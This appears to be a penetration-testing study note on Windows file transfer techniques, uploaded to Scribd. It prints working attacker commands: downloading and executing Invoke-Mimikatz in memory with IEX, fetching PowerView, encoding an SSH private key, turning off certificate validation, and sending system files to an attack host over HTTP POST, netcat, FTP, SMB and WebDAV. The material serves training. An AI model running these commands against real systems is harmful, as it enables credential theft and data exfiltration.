Scribd
Upload
48 views7 pages

File Transfers Module

The document outlines various Windows file transfer methods, including the use of DLLs, WMIC, Bitsadmin, and PowerShell for downloading and uploading files. It details commands for encoding, decoding, and confirming file integrity, as well as methods for transferring files via SMB and FTP. Additionally, it discusses techniques for executing scripts in memory and handling common errors in PowerShell.

Uploaded by

yasmineyounes2009
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
48 views7 pages

File Transfers Module

The document outlines various Windows file transfer methods, including the use of DLLs, WMIC, Bitsadmin, and PowerShell for downloading and uploading files. It details commands for encoding, decoding, and confirming file integrity, as well as methods for transferring files via SMB and FTP. Additionally, it discusses techniques for executing scripts in memory and handling common errors in PowerShell.

Uploaded by

yasmineyounes2009
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Windows File Transfer Methods

A DLL (Dynamic Link Library) is a file that holds functions (pieces of code) that other
programs can use when they need them. It helps save space and reuse code in different
programs.

Tools Used:
WMIC: A command-line tool for system management, used to execute commands and
control processes.
Bitsadmin: A tool for managing file transfers, used by attackers to download files quietly.
Certutil: A tool for managing certificates, also used to decode base64-encoded malicious
payloads.
regsvr32: A tool to register and load (run) DLLs, exploited by attackers to run malicious
code.
Userinit Process: A trusted process that runs at startup, used by attackers to hide malware
and evade detection.

Download Operations
md5sum is a Linux command-line utility that calculates the MD5 hash (also called an MD5
checksum) of a file like Get-FileHash in windows.

md5sum id_rsa Get-FileHash path_to_file -Algorithm md5

Encode SSH Key to Base64


cat id_rsa |base64 -w 0;echo

into a Windows PowerShell terminal

[[Link]]::WriteAllBytes("C:\Users\Public\id_rsa",
[Convert]::FromBase64String("base64_string"))

Confirming the MD5 Hashes Match

Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

PowerShell Web Downloads


WebClient methods for downloading data from a resource:
[Link] class

Method Description
OpenRead Returns the data from a resource as a Stream.
Method Description
OpenReadAsync Returns the data from a resource without blocking the calling
thread.
DownloadData Downloads data from a resource and returns a Byte array.
DownloadDataAsync Downloads data from a resource and returns a Byte array without
blocking the calling thread.
DownloadFile Downloads data from a resource to a local file.
DownloadFileAsync Downloads data from a resource to a local file without blocking the
calling thread.
DownloadString Downloads a String from a resource and returns a String.
DownloadStringAsync Downloads a String from a resource without blocking the calling
thread.

(New-Object [Link]).DownloadFile('<Target File URL>','<Output File


Name>')

(New-Object [Link]).DownloadFileAsync('<Target File URL>','<Output


File Name>')

PowerShell DownloadString - Fileless Method:

Download and Execute in Memory:


IEX (New-Object
[Link]).DownloadString('[Link]
Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

This command downloads a PowerShell script from the web and immediately executes it in
memory without saving it to the disk.

Alternative using Pipeline:


(New-Object
[Link]).DownloadString('[Link]
Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX

This is just another way of writing the same thing, where the downloaded string (the script) is
passed directly to IEX to be executed in memory.

PowerShell Invoke-WebRequest
To download a file from a URL:
Invoke-WebRequest
[Link]
ew.ps1 -OutFile PowerView.ps1

Aliases curl, wget, iwr...

Common Errors with PowerShell

Bypass Internet Explorer Configuration Error -> add -UseBasicParsing

Bypass SSL/TLS Certificate Errors ->


[[Link]]::ServerCertificateValidationCallback = {$true}

SMB downloads
Start SMB server
sudo impacket-smbserver share -smb2support /tmp/smbshare

Download from Windows


copy \\<IP>\share\filename

If guest access is blocked -> Start SMB server with credentials :


sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password
test

Mount SMB share on Windows


net use n: \\<IP>\share /user:test test
copy n:\filename

Use net use if copy \IP\share\file gives access error.

FTP Downloads
Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21

Transferring Files from an FTP Server Using PowerShell


(New-Object [Link]).DownloadFile('[Link]
'C:\Users\Public\[Link]')
Using built-in FTP client (for non-interactive shells)
echo open <your-ip> > [Link]
echo USER anonymous >> [Link]
echo binary >> [Link]
echo GET [Link] >> [Link]
echo bye >> [Link]
ftp -v -n -s:[Link]

Check if the file was downloaded:


more [Link]

Upload Operations
Encode File Using PowerShell

[Convert]::ToBase64String((Get-Content -path
"C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

Decode Base64 String in Linux


echo hashstring= | base64 -d > hosts

Confirm by hash

md5sum hosts

PowerShell Script to Upload a File to Python Upload Server

IEX(New-Object
[Link]).DownloadString('[Link]
plaintext/master/Powershell/PSUpload.ps1')

Invoke-FileUpload -Uri [Link] -File


C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded: C:\Windows\System32\drivers\etc\hosts


[+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373
PowerShell Base64 Web Upload
on the target:
You grab the content of a file and encode it in base64:

$b64 = [[Link]]::ToBase64String((Get-Content -Path


'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))

Then send it using a POST request:

Invoke-WebRequest -Uri [Link] -Method POST -Body $b64

on your host:

nc -lvnp 8000

From the netcat output, copy only the base64 string and decode it:

echo "<base64>" | base64 -d -w 0 > hosts

SMB Uploads
Most networks block outbound SMB (TCP/445) due to security risks, but WebDAV (which runs
over HTTP/HTTPS) can be used as an alternative to transfer files when SMB is restricted, since
Windows will fall back to HTTP if SMB fails.

using WebDav
sudo wsgidav --host=[Link] --port=80 --root=/tmp --auth=anonymous

Connecting to the Webdav Share


dir \\[Link]\DavWWWRoot

Uploading Files using SMB

copy C:\Users\john\Desktop\[Link] \\[Link]\DavWWWRoot\


copy C:\Users\john\Desktop\[Link] \\[Link]\sharefolder\
DavWWWRoot is a Windows Shell keyword used to indicate the root of a WebDAV server; it
doesn't exist on the actual server.
You can skip DavWWWRoot by directly referencing a real folder (e.g.,
\\[Link]\sharefolder ).
If SMB (TCP/445) is not blocked, impacket-smbserver can be used for file
uploads/downloads just like in normal SMB operations.

FTP Uploads
starting a server:

sudo python3 -m pyftpdlib --port 21 --write

--write -> to allow clients to upload files to our attack host.

PowerShell Upload File:

C:\user1> echo open [Link] > [Link]


C:\user1> echo USER anonymous >> [Link]
C:\user1> echo binary >> [Link]
C:\user1> echo PUT c:\windows\system32\drivers\etc\hosts >> [Link]
C:\user1> echo bye >> [Link]
C:\user1> ftp -v -n -s:[Link]
ftp> open [Link]

Log in with USER and PASS first.

ftp> USER anonymous


ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye

Linux File Transfer Methods

You might also like